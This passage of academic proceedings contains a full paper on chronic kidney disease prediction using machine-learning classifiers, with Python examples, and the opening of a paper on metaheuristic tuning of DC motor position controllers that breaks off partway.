33. Ronit, “Kaggle Dataset.” https://www.kaggle.com/ronitf/heart-disease-uci.
34. Alweshah, M., Alzubi, O. A., & Alzubi, J. A. (2016). Solving attribute reduction problem
using wrapper genetic programming. IJCSNS International Journal of Computer Science and
Network Security, 16(5), 77–84.
35. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & de Albuquerque,
V. H. C. (2020). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications, 32(15), 10915–10925. https://doi.org/10.1007/
s00521-018-3688-6
36. Abdi, H., & Williams, L. J. (2010). Principal component analysis. Wiley Interdisciplinary
Reviews: Computational Statistics, 2(4), 433–459. https://doi.org/10.1002/wics.101
37. Karamizadeh, S., Abdullah, S. M., Manaf, A. A., Zamani, M., & Hooman, A. (2013). An
overview of principal component analysis. Journal of Signal and Information Processing,
04(03), 173–175. https://doi.org/10.4236/jsip.2013.43b031
38. Xanthopoulos, P., Pardalos, P. M., & Trafalis, T. B. (2013). Linear discriminant analysis.
Mikrobiyoloji Bulteni, 38(4), 27–33.
39. Gourisaria, M. K., Das, S., Sharma, R., Rautaray, S. S., & Pandey, M. (2020). A deep learning
model for malaria disease detection and analysis using deep convolutional neural networks.
International Journal on Emerging Technologies, 11(2), 699–704.
40. Sharma, R., Das, S., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). A model for
prediction of paddy crop disease using CNN. pp. 533–543.
Inferring the Occurrence of Chronic
Kidney Failure: A Data Mining Solution

Rwittika Pramanik, Sandali Khare, and Mahendra Kumar Gourisaria

Abstract The kidney is a vital and essential organ, as it helps to get rid of waste and excess fluids from our body. Our kidneys remove acids that are secreted by the cells in our body, and thus a stable balance of salts, water and minerals such as potassium, sodium, calcium and phosphorus is maintained in our blood. Kidneys also produce hormones that keep our blood pressure under control, help make red blood cells, and keep our bones robust and resilient. Hence, taking care of and maintaining the proper health of our kidneys is of utmost importance and significance. Prediction and identification of kidney disease at an early stage gives us an advantage and allows the required medical treatment to be taken in time. The imported dataset has been preprocessed by removing all the redundant features, and contrasting data mining classification methods such as decision tree, RF, SVM, Naïve Bayes and k-NN classification are implemented in this paper for the discernment and screening of the disease. The accuracy of the prediction produced by each of the classification techniques has been compared and exhibited using different performance metrics such as specificity, sensitivity, negative predictive value, positive predictive value and accuracy. It has been computed that the random forest classifier achieved the highest accuracy of 98.81%, surpassing all the other classification techniques.

Keywords Machine learning · Health care · Chronic kidney disease · Classification · Data mining · Random forest · Naïve Bayes

1 Introduction

Health care is the nurture and improvement of health through the prevention, detection, therapy, recuperation and healing of diseases. It is a part of life, and without genuine and proper health care the population is far more at risk and peril. The major challenge, however, is to supply advanced care and medical services at an inexpensive monetary value. Diseases diagnosed at an elementary stage will spare the

R. Pramanik · S. Khare · M. K. Gourisaria (B)


School of Computer Engineering, KIIT Deemed To Be University, Bhubaneswar, Odisha 751024,
India


victim from the cost of complicated treatments, and thus the expenditure is expected to decrease significantly. Chronic kidney disease (CKD) is the form of disorder in which the kidneys are damaged, lose their ability to filter the blood properly, and cause wastes to pile up in the body. The disorder is termed 'chronic' because the kidneys are damaged steadily over a period of time. The most challenging task is handling the enormous amount of input required for supervising patient information and healthcare statistics. The required filtration of the data is therefore applied, and different data mining classification approaches such as random forest, decision tree classifier, SVM, KNN and Naive Bayes classifier are exercised to locate and detect the disease [1]. The data employed here were recorded in India over a period of two months with 25 features, for example blood pressure, sugar and many more.
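As a sketch only, the preprocessing and classification step just described could look as follows; the file name, the class-label column name and the imputation choices are assumptions made for illustration (they follow the layout of the commonly used UCI chronic-kidney-disease CSV), not details taken from this paper, and the random forest settings are not the authors' exact configuration.

```python
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score

# Load a CKD-style dataset (assumed file and label-column names)
df = pd.read_csv("kidney_disease.csv").drop_duplicates()

# Simple imputation: medians for numeric columns, modes for categorical ones
for col in df.columns:
    if pd.api.types.is_numeric_dtype(df[col]):
        df[col] = df[col].fillna(df[col].median())
    else:
        df[col] = df[col].fillna(df[col].mode()[0])

X = pd.get_dummies(df.drop(columns=["classification"]))   # assumed label column
y = df["classification"]

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)
model = RandomForestClassifier(n_estimators=200, random_state=0).fit(X_train, y_train)
print("Test accuracy:", accuracy_score(y_test, model.predict(X_test)))
```

The same split can then be used to compute the metrics reported in this study (specificity, sensitivity, PPV, NPV and accuracy) for each of the compared classifiers.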
The various parts into which this research paper is segmented are as follows. An outline of chronic kidney disease is presented in Sect. 2. Section 3 supplies an account of the literature survey on kidney disorders. The flowchart of the working is described in Sect. 4. An abridged analysis of the classification techniques such as SVM, decision tree, RF, Naive Bayes and KNN is given in Sect. 6. Section 7 covers the analysis of the results of the various models used for prediction. The inference, a quick survey of the document and the future work that can be done based on this research are provided in Sect. 8.
provided in Sect. 8.

2 Chronic Kidney Disease

Chronic kidney disease is a long-term condition in which the kidneys fail to work properly and perform their basic functions. The risk of becoming vulnerable to this disease increases with age. Anyone can be affected by it, but it is more common among people of black or South Asian origin. Several factors increase the risk of CKD, as summarised in Fig. 1.

Fig. 1 Causes of chronic kidney disease

Prediction of CKD will help to initiate the required treatment from an early stage and thus reduce both the expenditure and the risk of further complicated treatment procedures. There are a total of five stages [2] of CKD, namely:
Stage 1: mild kidney damage, protein in urine.
Stage 2: fatigue, low appetite, weakness.
Stage 3: anaemia (low RBC count), high blood pressure, bone disease.
Stage 4: nausea and vomiting, complete loss of appetite.
Stage 5: risk of heart disease and stroke, kidney failure.
In 2011, 63,538 CKD cases were registered by the CKD Registry of India, and the numbers are growing significantly each year [3]. Approximately 10% of the global population suffers from chronic kidney disease (CKD), and every year millions die due to the shortage of affordable treatment. According to the Global Burden of Disease study of 2010, CKD ranked 27th among the causes of death worldwide in 1990, and by 2010 its rank had risen to 18th; only HIV and AIDS have shown a comparable rise in this ranking [4].

3 Literature Survey

Aljaaf et al. studied and predicted the diagnosis of chronic kidney disorder at an early stage, and a total of four machine learning classification techniques have been used to picture the outcome [5]. Almansour et al. used SVM and ANN for the detection of CKD; a dataset comprising 400 samples and 24 features was employed for the same [6]. Xiao et al. predicted the severity of chronic kidney disorder using nine machine learning models, including ridge regression, logistic regression and random forest; the best performance, with an AUC of 0.873, was given by logistic regression [7]. Charleonnan et al. inspected four machine learning techniques, comprising LR, KNN, SVM and decision tree, for predicting the presence of chronic kidney disease [8]. Saha et al. predicted the presence of CKD using various ML classification methods such as logistic regression, Naïve Bayes, multilayer perceptron, Adam-DNN and random forest; the highest accuracy of 97.35% was achieved by Adam-DNN [9]. Sinha et al. compared the performance of KNN and support vector machine, in terms of precision, execution time and accuracy, in the prediction of chronic kidney disorder; it was observed that the accuracy of SVM is less than that of K nearest neighbour [10]. Qin et al. explored six classification methods, including Naïve Bayes, SVM, feed forward neural network, random forest and KNN, out of which random forest ranked first with the highest accuracy of 99.75% [11]. Almasoud et al. performed different tests, such as the ANOVA test, Cramer's V test and Pearson's correlation, to remove all the unnecessary features from the dataset, and after training various algorithms such as gradient boosting, logistic regression, random forest and SVM, 99.1% accuracy was achieved [12]. Rubini et al. used three classifiers, namely logistic regression, radial basis function and multilayer perceptron, and put forward a new chronic kidney disease dataset; the outcome of the experiment is shown in terms of accuracy, sensitivity, F-score, specificity and type I and II errors, and the agreement between the expert classification and the classifier is measured by the Kappa value
[13]. Devika et al. performed classification using several machine learning models, namely random forest, K-nearest neighbour and Naïve Bayes, for chronic kidney disease diagnosis, and the performance was measured in terms of execution time, accuracy and precision. The outcome predicted by random forest was found to be better than that of the other two classification algorithms used in the experiment [14].

4 Proposed Model

The main aim of the models is to predict whether a patient is suffering from CKD or not, based on the various features provided in the dataset. The complete workflow is illustrated in Fig. 2. First, the raw data is imported and pre-processing techniques such as removal of outliers, conversion of object types to numerical types and imputation of missing values are performed. The attributes are filtered, and only the necessary features are passed on to the classification models so that better accuracy is achieved [15]. The classification algorithms used in this work are LR, SVM, Naïve Bayes, KNN, decision tree and RF. In machine learning, we come across a vast range of metrics that measure the performance of models; in this approach, the performance metrics of sensitivity, specificity, PPV, NPV and accuracy have been employed.

Fig. 2 Flow of work for diagnosis of CKD

5 Data Exploration and Filtration

On analysing the dataset, the total numbers of numerical and categorical variables are found to be 12 and 13, respectively [16]. However, a few of the numerical variables are found to be of object type, the reason being the presence of garbage characters. These variables are therefore converted to numerical type after replacing the garbage characters with NaN values. The total number of missing values in each column is computed, and it is found that a large portion of the data is missing, the highest being RBC with a total of 107 missing values. As the number of samples in this dataset is considerably small, deleting every row containing missing values would not be efficient, so the missing values of the numerical and categorical columns are imputed [17] with the median and mode, respectively. Next, the number of outliers in each data column is examined using z-score analysis; almost all the attributes have outliers, which are then imputed with the median [18].
For dimensionality reduction, all the non-numerical categorical attributes are converted to numeric form using binary values [19]. The correlation between the attributes is displayed using the heatmap in Fig. 3, and attributes are dropped when the absolute correlation coefficient exceeds 0.6 [20].
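To make these filtration steps concrete, the following is a minimal Python/pandas sketch and not the authors' original code; the file name, the label value 'ckd' and the column names 'pcv', 'wc', 'rc' and 'classification' are assumptions about how the CKD data is stored.

```python
import numpy as np
import pandas as pd

# Assumed file and column names; adjust to the actual dataset layout.
df = pd.read_csv("kidney_disease.csv").replace("?", np.nan)

# Object-typed columns that should be numeric are coerced back to numbers
# (garbage characters were already turned into NaN above).
for col in ["pcv", "wc", "rc"]:
    df[col] = pd.to_numeric(df[col], errors="coerce")

# Impute numeric columns with the median and categorical ones with the mode.
for col in df.columns:
    if pd.api.types.is_numeric_dtype(df[col]):
        df[col] = df[col].fillna(df[col].median())
    else:
        df[col] = df[col].fillna(df[col].mode()[0])

# Replace z-score outliers (|z| > 3) with the column median.
num_cols = df.select_dtypes(include=[np.number]).columns
z = (df[num_cols] - df[num_cols].mean()) / df[num_cols].std()
for col in num_cols:
    df.loc[z[col].abs() > 3, col] = df[col].median()

# Convert the remaining categorical attributes to binary (0/1) columns.
label = (df.pop("classification") == "ckd").astype(int)   # 'ckd' label assumed
df = pd.get_dummies(df, drop_first=True)

# Drop one attribute from every pair whose absolute correlation exceeds 0.6.
corr = df.corr().abs()
upper = corr.where(np.triu(np.ones(corr.shape, dtype=bool), k=1))
df = df.drop(columns=[c for c in upper.columns if (upper[c] > 0.6).any()])
df["classification"] = label
```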

Fig. 3 Correlation heatmap



6 Classification Methods

6.1 Decision Tree

A decision tree is formed by answering a sequence of questions about the dataset record. It basically consists of three types of nodes: the root node, internal nodes and leaf nodes, as shown in Fig. 4. The root node has outgoing edges and no incoming edges [21]. Internal nodes have one or more outgoing edges and exactly one incoming edge. Leaf nodes have one incoming edge and no outgoing edges. A class is allocated to each leaf node [22]. The benefits and the downsides of this technique are listed in Table 1.

Fig. 4 Overview of a decision tree: the root node splits into internal nodes at split points, which end in leaf nodes

Table 1 Pros and cons of decision tree
Pros: numerical as well as categorical data can be processed; can be deciphered easily; computation required is less; high dimensionality of data is not a problem
Cons: only categorical output is produced; it is not stable; prone to overfitting; requires pruning
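As one hedged illustration of fitting such a tree with scikit-learn (the DataFrame df and the label column 'classification' are assumed from the preprocessing sketch in Sect. 5; max_depth stands in for the pruning mentioned in Table 1):

```python
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier

X = df.drop(columns=["classification"])
y = df["classification"]
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.3, random_state=42, stratify=y)

# A shallow tree; limiting the depth acts as a simple form of pruning.
tree = DecisionTreeClassifier(max_depth=5, random_state=42)
tree.fit(X_train, y_train)
print("Decision tree accuracy:", tree.score(X_test, y_test))
```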

6.2 Logistic Regression

This technique is one of the most widely used methods for binary classification problems, with benefits and drawbacks listed in Table 2. The logistic function used in this technique is the basis for the name logistic regression. Statisticians developed the sigmoid, or logistic, function to express the characteristics of population growth. It is basically an S-shaped curve that can take any real-valued input and scale it into the range 0–1. Logistic regression can be further classified into different types such as ordinal LR, multinomial LR and binary LR [23]. The logistic function, which forms the basis of logistic regression, is depicted by the equation

σ(z) = p = 1 / (1 + e^(−z))    (1)

Table 2 Pros and cons of logistic regression
Pros: no overfitting; can be trained quickly; accuracy is good for simple data sets; implementation is easy
Cons: linear boundaries are constructed; not ideal when there are more features than observations; linearity is assumed; only discrete functions can be predicted
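A small numerical check of Eq. (1), added here only as an illustration, shows how the logistic function squashes any real input into the (0, 1) range that is then read as a class probability:

```python
import numpy as np

def sigmoid(z):
    # Eq. (1): maps any real-valued input into the (0, 1) interval.
    return 1.0 / (1.0 + np.exp(-z))

for z in (-4.0, 0.0, 4.0):
    print(f"sigma({z:+.1f}) = {sigmoid(z):.3f}")   # ~0.018, 0.500, ~0.982
```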

6.3 Naïve Bayes

A Bayes Theorem based algorithm, this technique is used to find the solution of
classification problems. Naïve Bayes classifier builds machine learning models that
are very fast and produce predictions quickly. It is one of the most fruitful and easy
algorithms, but has downsides too, all of which are stated in Table 3. The Bayes
Theorem formula is computed as

P(A|B) = P(B|A) P(A) / P(B)    (2)

Table 3 Pros and cons of Naïve Bayes
Pros: easily implemented; parameters can be estimated even from small training data; accuracy is good; high dimensionality of data is not a problem
Cons: cannot model dependencies amongst variables; problems due to vanishing values; overhead in case of smoothing; assumes class-conditional independence

6.4 Support Vector Machine

Employed for both classification and regression, this is one of the most commonly used supervised algorithms. Its main objective is to produce a decision boundary, called a hyperplane [24], that divides the n-dimensional space into classes so that every new input is assigned to the right category. Table 4 lists the benefits and downsides of this machine learning technique.

Table 4 Pros and cons of SVM
Pros: fruitful in high-dimensional spaces; separation with a clear margin gives good accuracy; results are better when the number of samples is less than the number of dimensions; memory-efficient
Cons: noise in the data set reduces accuracy; not apt for huge data sets; the kernel function needs to be chosen well; probability estimates are not given

6.5 KNN

KNN is one of the most elementary machine learning algorithms and is non-parametric. In this approach, the similarity between a new case and the existing cases is checked, and the new case is assigned to a class according to this similarity. Though it is mostly employed for classification, KNN can also be used to predict the outcome of regression problems. In KNN, the training data is not absorbed straightaway, and hence the term lazy learner is given to this technique. The drawbacks and benefits of this classification technique are stated in Table 5.

Table 5 Pros and cons of KNN
Pros: uncomplicated and intuitive; no assumptions are made; implementation is very easy for multiclass problems; evolves regularly
Cons: the algorithm is slow; accuracy decreases as the number of attributes increases; susceptible to outliers; cannot deal with missing data

6.6 Random Forest

In this type of machine learning approach, various classifiers are blended so that a complicated problem can be solved and the model performance increases significantly. In a random forest, the prediction of a single decision tree is not considered in isolation, as shown in Fig. 5; rather, the outputs of several decision trees are taken into consideration, and the final result is produced by averaging or by majority vote. Table 6 lists the pros and cons of random forest.

Fig. 5 Overview of random forest

Table 6 Pros and cons of random forest
Pros: excellent accuracy for predicting outcomes; huge data is not a problem at all; normalisation is not necessary; missing data can be taken care of efficiently
Cons: possibility of overfitting; complex; more time required; variable importance is not analysed
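As an illustration of how the six classifiers of this section can be trained and compared under identical conditions, the following scikit-learn sketch is one possible setup; X_train, X_test, y_train, y_test are assumed from the earlier decision tree sketch, and the hyperparameters are illustrative rather than the authors' tuned values.

```python
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier

models = {
    "LR": LogisticRegression(max_iter=1000),
    "Decision tree": DecisionTreeClassifier(random_state=42),
    "Naive Bayes": GaussianNB(),
    "SVM": SVC(),
    "KNN": KNeighborsClassifier(n_neighbors=5),
    "Random forest": RandomForestClassifier(n_estimators=100, random_state=42),
}

# Fit each classifier on the same split and report its test accuracy.
for name, model in models.items():
    model.fit(X_train, y_train)
    print(f"{name}: accuracy = {model.score(X_test, y_test):.4f}")
```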

7 Examination of Performance

The confusion matrix is a table that is very frequently used to measure the capability of various machine learning classification methods; it is also known as the error matrix.
The terminology of the confusion matrix, which is shown in Table 7, is explained below:
True Positive (TP): the prediction is positive and it is correct.
True Negative (TN): the prediction is negative and it is correct.
False Positive (FP): the prediction is positive but it is wrong.
False Negative (FN): the prediction is negative but it is wrong.

Table 7 Confusion matrix of chronic kidney disorder
Label of class      CKD present    CKD not present
CKD present         TP             FN
CKD not present     FP             TN

The confusion matrices of all the classification techniques employed to predict the result are displayed in Fig. 6.

Fig. 6 Confusion matrices of the six machine learning classification algorithms

The various performance metrics [25] computed in Table 8 are explained as follows.
Sensitivity = TP/(TP + FN): the truly positive percentage.
Specificity = TN/(TN + FP): the truly negative percentage.
PPV (Positive Predicted Value) = TP/(TP + FP): the probability that a patient predicted to have CKD actually suffers from it.
NPV (Negative Predicted Value) = TN/(TN + FN): the probability that a patient predicted not to have CKD actually does not suffer from it [26].

Table 8 Measure of performance of contrasting classifier used


Classifier Sensitivity (%) Specificity (%) PPV (%) NPV (%)
Logistic regression 97.14 89.79 87.17 97.78
Decision tree 85.71 97.96 96.77 90.57
Naïve Bayes 100.00 93.88 92.11 100.00
SVM 94.29 91.84 89.19 95.74
KNN 82.86 69.39 65.91 85.00
Random forest 97.14 100.00 100.00 98.00

The accuracy of a classification model is determined by calculating the percentage of right predictions on the test data set [27]. It can be computed as correct predictions/all predictions, or in terms of the confusion matrix as
Accuracy = (TP + TN) / (TP + TN + FP + FN)    (3)
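All the metrics above can be derived directly from the four confusion-matrix counts; the sketch below is an illustration that assumes binary labels and the fitted models dictionary from the previous snippet.

```python
from sklearn.metrics import confusion_matrix

rf = models["Random forest"]                       # evaluated classifier from above
tn, fp, fn, tp = confusion_matrix(y_test, rf.predict(X_test)).ravel()

sensitivity = tp / (tp + fn)                       # truly positive percentage
specificity = tn / (tn + fp)                       # truly negative percentage
ppv = tp / (tp + fp)                               # positive predicted value
npv = tn / (tn + fn)                               # negative predicted value
accuracy = (tp + tn) / (tp + tn + fp + fn)         # Eq. (3)
print(sensitivity, specificity, ppv, npv, accuracy)
```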

The accuracy of the six classification methods and their comparison graph is
plotted in Fig. 7.

Fig. 7 Comparison graph of accuracy (%) for the different classifiers used (LR, decision tree, Naïve Bayes, SVM, KNN and random forest), with random forest reaching the highest value of 98.81%



Table 9 lists the comparative analysis and performance measure of other papers
that are based on the experiment of predicting chronic kidney disease using various
data mining classification techniques.

Table 9 Comparative analysis
Authors | Year | Methodology | Result
Jing Xiao et al. | 2019 | LR, elastic net, ridge, lasso, RF, SVM, NN, XGBoost, k-NN | LR ranked first with an AUC of 0.873 and 82% accuracy
Ahmed J. Aljaaf et al. | 2018 | SVM, MLP, LOGR, RPART | MLP and LOGR both got the highest accuracy of 98.1%
Anik Saha et al. | 2019 | Random forest, multilayer perceptron, Naïve Bayes, Adam-DNN, logistic regression | The best accuracy of 96.75% has been achieved by the random forest classifier
Anusorn Charleonnan et al. | 2016 | SVM, KNN, decision tree, logistic regression | Surpassing all the other classifiers, SVM achieved the highest accuracy of 98.3%
Parul Sinha et al. | 2015 | SVM, KNN | KNN got the better accuracy of 78.75%

8 Conclusion and Future Work

Chronic kidney disease is a critical health condition leading to a large number of deaths each year, and hence determining the presence of the disorder in a patient is necessary so that patients are spared the risk of further complicated treatments and surgery. The dataset was filtered by removing all the redundant features, and a total of six classification techniques, namely SVM, KNN, logistic regression, random forest, decision tree and Naïve Bayes, were employed in this experiment and compared with each other on different performance metrics. The performance metrics used are specificity, sensitivity, negative predicted value, positive predicted value and accuracy. From the entire study, it has been observed that chronic kidney disorder is detected most accurately by the random forest classification model, with an accuracy of 98.81%, thus making early-stage diagnosis of the disease efficient and fruitful.
This research work can be employed in developing an app or website where, on entering the details of a patient such as sugar level, blood pressure and the other required attributes, the model would predict whether the patient is suffering from CKD or not, making the work of the medical industry faster and more effective. The necessary treatment can then be initiated quickly, reducing the risk to the patient.

References

1. Gourisaria, M. K., Das, S., Sharma, R., Rautaray, S. S., & Pandey, M. (2020). A deep learning
model for Malaria disease detection and analysis using deep convolutional neural networks.
International Journal of emerging Technologies, 11(2), 699–704.
2. Stages of CKD. https://www.healthline.com/health/ckd-stages. Last accessed 26 Jan 2021.
3. Chronic Kidney Disease (CKD). Prevalence and Management in India. https://www.med
india.net/health_statistics/diseases/chronic-kidney-disease-ckd-india.asp. Last accessed 26 Jan
2021.
4. Global Facts: About Kidney Disease. https://www.kidney.org/kidneydisease/global-facts-
about-kidney-disease. Last accessed 26 Jan 2021
5. Aljaaf, A. J., Al-Jumeily, D., Haglan, H. M., Alloghani, M., Baker, T., Hussain, A. J., & Musta-
fina, J. (2018). Early prediction of chronic kidney disease using machine learning supported
by predictive analytics. In IEEE congress on evolutionary computation (CEC) (pp. 1–9). IEEE
6. Almansour, N. A., Syed, H. F., Khayat, N. R., Altheeb, R. K., Juri, R. E., Alhiyafi, J., & Olatunji,
S. O. (2019). Neural network and support vector machine for the prediction of chronic kidney
disease: A comparative study. Computers in Biology and Medicine, 109, 101–111.
7. Xiao, J., Ding, R., Xu, X., Guan, H., Feng, X., Sun, T., & Ye, Z. (2019). Comparison and
development of machine learning tools in the prediction of chronic kidney disease progression.
Journal of Translational Medicine, 17(1), 1–13.
8. Charleonnan, A., Fufaung, T., Niyomwong, T., Chokchueypattanakit, W., Suwanna-wach, S., &
Ninchawee, N. (2016). Predictive analytics for chronic kidney disease using machine learning
techniques. In Management and Innovation Technology International Conference (MITicon)
(pp. 80–83), Bang-San
9. Saha, A., Saha, A., & Mittra, T. (2019). Performance measurements of machine learning
approaches for prediction and diagnosis of chronic kidney disease (CKD). In Proceedings
of the 2019 7th international conference on computer and communications management
(pp. 200–204).
10. Sinha, P., & Sinha, P. (2015). Comparative study of chronic kidney disease prediction using
KNN and SVM. International Journal of Engineering Research and Technology, 4(12), 608–
612.
11. Qin, J., Chen, L., Liu, Y., Liu, C., Feng, C., & Chen, B. (2019). A machine learning methodology
for diagnosing chronic kidney disease. IEEE Access, 8, 20991–21002.
12. Almasoud, M., & Ward, T. E. (2019). Detection of chronic kidney disease using machine
learning algorithms with least number of predictors. International Journal of Soft Computing
and Its Applications, 10(8).
13. Rubini, L. J., & Eswaran, P. (2015). Generating comparative analysis of early stage prediction
of Chronic Kidney Disease. International Journal of Modern Engineering Research (IJMER),
5(7), 49–55.
14. Devika, R., Avilala, S. V., & Subramaniyaswamy, V. Comparative study of classifier for chronic
kidney disease prediction using naive Bayes, KNN and random forest. In 2019 3rd International
conference on computing methodologies and communication (ICCMC) (pp. 679–684). IEEE.
15. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies., 11(3), 531–538.
16. Categorical Variable. https://en.wikipedia.org/wiki/Categorical_variable. Last accessed 25 Jan
2021.
17. Anand, A., Anand, H., Rautaray, S. S., Pandey, M., & Gourisaria, M. K. (2020). Analysis and
prediction of chronic heart diseases using machine learning classification models. International
Journal of Advanced Trends in Computer Science and Engineering, 9(5), 8479–8487, 227.
18. Machine Learning Standardization. https://towardsai.net/p/machine-learning/machine-lea
rning-standardization-z-score-normalization-with-mathematics. Last accessed 27 Jan 2021.
19. Mishra, S., Pandey, M., Rautaray, S. S., & Gourisaria, M. K. (2020). A survey on big data analyt-
ical tools and techniques in health care sector. International Journal on Emerging Technologies.,
11(3), 554–560.
20. Feature Selection For Machine Learning in Python. https://towardsdatascience.com/feature-
selection-for-machine-learning-in-python-filter-methods-6071c5d267d5. Last accessed 26 Jan
2021.
21. Decision Trees in Machine Learning. https://towardsdatascience.com/decision-trees-in-mac
hine-learning-641b9c4e8052. Last accessed 20 Jan 2021.
22. Sharma, R., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9(4), 5788–5795.
23. Logistic Regression for Machine Learning. https://machinelearningmastery.com/logistic-reg
ression-for-machine-learning/. Last accessed 20 Jan 2021.
24. SVM- Introduction to Machine Learning. https://towardsdatascience.com/support-vector-mac
hine-introduction-to-machine-learning-algorithms-934a444fca47. Last accessed 21 Jan 2021.
25. Evaluating Categorical Models. https://towardsdatascience.com/evaluating-categorical-mod
els-ii-sensitivity-and-specificity-e181e573cff8. Last accessed 24 Jan 2021.
26. Positive and Negative Predictive Values. https://en.wikipedia.org/wiki/Positive_and_negative_
predictive_values. Last accessed 24 Jan 2021.
27. Machine Learning-Performance Metrics. https://www.tutorialspoint.com/machine_lear
ning_with_python/machine_learning_algorithms_performance_metrics.htm. Last accessed
24 Jan 2021.
Comparative Analysis for Optimal
Tuning of DC Motor Position Control
System

Avi Singhal, Dhruv Mittal, Ritwik Roy, and Pankaj Dahiya

Abstract DC motors are an important component and are used in industrial machines and engineering applications. The position control of a DC motor is useful
machines and engineering applications. The position control of DC motor is useful
in precision control systems. This study aims to present a comparative analysis of
different controllers and to tune these controllers using metaheuristic algorithms for
DC motor position control. The position control is modeled using its transfer func-
tion. In this study, the performance of PID, fractional-PID (F-PID) and PID with
filter coefficient Ni (PID-N) has been compared. The controller’s parameters, i.e.,
K p , K i , K d , N i , μ, λ have been tuned by using global neighborhood algorithm (GNA)
and bat algorithm (BA). The optimization performance of the chosen algorithms is
compared using transient response analysis. The results obtained after performing the
simulation show that the overall performance of PID-N controller is better compared
to the other controllers, and GNA does better overall tuning of controller parameters
compared to BA. All simulations were done using MATLAB/Simulink.

Keywords DC motor · Global neighborhood algorithm · Bat algorithm · PID · F-PID · PID-N

1 Introduction

The DC motor, which refers to the direct current motor, is a common component in
many electronic devices. It works according to Lorentz law; the DC motor assembly
has a permanent magnet in which the conductive coil called armature is placed. At
the center, there is a shaft which facilitates rotation. The armature is connected to
commutator rings, which helps to keep contact with the supply at all times, and the
brushes connect the supply to the commutator rings. Another type of motor called the

A. Singhal (B) · D. Mittal · R. Roy · P. Dahiya
Department of Electronics and Communication Engineering, Delhi Technological University, New Delhi, India
P. Dahiya
e-mail: pankajdahiya@dtu.ac.in


induction motor works according to electromagnetic induction principle. This motor


is also called alternating current (AC) motor. The maintenance cost of an induction
motor is less compared to that of DC motor, the lifetime of AC motor is also greater
than DC motor, but still, DC motor is widely used. Some of the applications of DC
motor are as follows: toys, two-wheel electric vehicles, fans. The DC motor has good
speed control characteristics, and many people have worked on it.
To achieve stable response output, we use a controller. The controller uses its
parameters as the control inputs. These control variables are tuned according to
requirement to get desired output. Using a feedback loop, the output is taken and
then subtracted from input to get the error which is then fed to controller, which
when used with tuned control parameters, gives an output which is stable.
When using a controller, it is necessary to tune the control parameters to obtain a stable output. This is a tedious process if done manually, as the solution space is very large, and as the number of variables increases, it becomes difficult to find the best set of control parameters. To resolve this, metaheuristic algorithms can be used. In these algorithms, the solution space is searched using an objective function, designed according to the requirements, to find the right set of control parameters. The main purpose of these algorithms is to generate solutions, calculate their objective function values and minimise the objective.
In order to achieve DC motor position control, PID controllers have been used
previously, and many methods were implemented by researchers for finding the
controller parameters. Metaheuristic algorithms have also been proposed for the
controller tuning, and Neenu Thomas proposed position control using Ziegler-
Nichols and genetic algorithm optimized PID controller [1]. Amir replaced the PID
controller by artificial neural network controller [2] for DC motor position control.
Fuzzy logic-based self-tuning PID controller [3, 4] was implemented by Flores.
Gravitational search algorithm [5] has been used for PID tuning of DC motor posi-
tion control by Serhat Duman. PID controller was proposed for optimization for
induction motor [6] by Youssef. A significant amount of work has been done on
DC motor speed control. The PID controller tuning for speed control using various
techniques has been presented in [7] by Manoj, and particle swarm algorithm [8] was
implemented by B. Allaoua. Ziegler-Nichols tuning for speed control was done by P.
M. Meshram [9]. Gray wolf optimization was used for PID controller tuning for DC
motor speed control by K. R. Das [10]. Fractional order PID [11, 12] controller has
also been used for speed control. Bat algorithm has been implemented for optimiza-
tion of speed control for brushless DC motor [13]. GNA was previously applied to
tune and optimize parameters of a PID controller for an automatic voltage regulator
system by H. Gozde [14]. However, the global neighborhood algorithm (GNA) and
bat algorithm (BA) have not yet been implemented for DC motor position control.
In this study, the effectiveness in tuning controllers for DC motor position control is
explored using these two algorithms.
This paper compares PID, F-PID and PID-N controllers as they have been tuned
using GNA and BA. The paper is presented as follows. A brief explanation of the DC
motor position control is provided in Sect. 2 and its corresponding transfer function.
Section 3 explains the working of the controllers. Section 4 explains the algorithms
used, and Sect. 5 shows the objective function that is being optimized, followed by
simulation and results in Sect. 6. The conclusion is presented in Sect. 7.

2 DC Motor Position Control System

The DC motor converts electrical energy to mechanical energy. Position control is


required in precision control systems, where the position has to be rotated according
to a given input signal. The self-excited DC motor with field coil connected in parallel
with the armature is a suitable configuration for position control, and the speed control
is almost constant with torque for this configuration. In the shunt configuration, the
resistance of the field coil should be large so that most of the current flows through
the armature, and so that the value of torque will be high.
The transfer function [1] used is shown in Eq. (1),

θ(s)/v(s) = 1.2 / (0.00077 s^3 + 0.0539 s^2 + 1.441 s)    (1)

where θ = angular displacement in radians, v = armature voltage in volts.

3 Controller

3.1 PID

The three parameters of a PID controller are K p , K i and K d . The constant K p produces
an output to correct the error which is proportional to it. The constant K i helps to
diminish the error by integrating it over time until it reaches 0 value. The derivative
constant K d tries to reduce error as it predicts future behavior of error as it uses rate
of change of error. The general equation for PID controller is as Eq. (2)

G_PID = K_p e(t) + K_i ∫_0^t e(t) dt + K_d de(t)/dt    (2)

Fig. 1 Block diagram of PID-N controller

3.2 PID-N

The derivative block used in PID controller introduces noise. To avoid this
phenomenon, it is possible to use a filtered derivative loop which has filter coef-
ficient N i . The feedback loop has 1/s in feedback path and N i in the forward path.
The diagram of PID-N is shown in Fig. 1.
PID-N controller produces output according to Eq. (3)

G_PID-N = K_p + K_i/s + K_d · N_i/(1 + N_i/s)    (3)

3.3 F-PID

